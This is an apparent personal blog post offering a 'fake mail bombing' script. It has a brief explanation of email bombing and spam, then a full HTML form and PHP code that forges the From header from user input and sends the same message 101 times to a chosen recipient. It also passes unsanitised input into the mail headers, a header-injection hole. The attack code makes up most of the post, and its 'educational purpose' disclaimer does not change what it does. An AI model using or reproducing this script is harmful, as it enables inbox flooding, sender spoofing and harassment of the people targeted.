image1 image2 image3

HELLO I'M AKHIL SUDHAKARAN|WELCOME TO MY PERSONAL BLOG|I LOVE TO DO CREATIVE THINGS|ONE EYE SEES, THE OTHER FEELS

FAKE MAIL BOMBING SCRIPT


Doer Arts Fake Mailer(Tester)



What is Fake mail bombing :
Email Bombing as clear from the name is sending the mass emails that is large number of emails to a email ID in a single click. Email spamming is like sending an email to large number of email IDs in a single click. These activties are performed mainly for the advertisements of the products or services provided by a company. Many spammers spam to collect individual's personal information through some stupid things like 'fill these details to get your lottery amount' and that information is sold to businessmen looking for the people of different categories. There could be many more reasons of spamming. Spammers use automated tools to collect as many emails available on websites,forms,chat rooms and send spams to them.

FAKE MAILER

Recipent:
Sender name:
Sender Email Address:
Subject:
Content:



FAKE MAIL BOMBING SCRIPT

<html>
<h1>Doer Arts Fake Mailer(Tester)</h1>
</html>

<table border=2>
<form action="" method=post>
<tr><td>Recipent: </td><td><input type=text name=email size=30></td></tr>
<tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr>
<tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr>
<tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr>
<tr><td>Content: </td><td><textarea rows=10 cols=30 name=content></textarea></td></tr>
<tr><td><input type=submit value="Send Mail"></td></tr>
</form>
</table>


<?php
$email = $_POST['email'];
$content = nl2br($_POST['content']);
$content .= "This is a Fake mail, Sent for Testing or Educational Purpose. Doer Arts is not Responsible for any Data Loss from this Mail";
$name = $_POST['name'];

$sender = $_POST['sender'];

$subject = $_POST['subject'];

$headers = "From: $name "."<".$sender.">\r\n";
//add boundary string and mime type specification
//$headers .= 'MIME-Version: 1.0' . "\r\n";
//$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

//send the email 100 times
for ($i = 0; $i<=100; $i++)
{
mail($email, $subject, $content, $headers );
}
?>

Share this:

CONVERSATION

0 comments: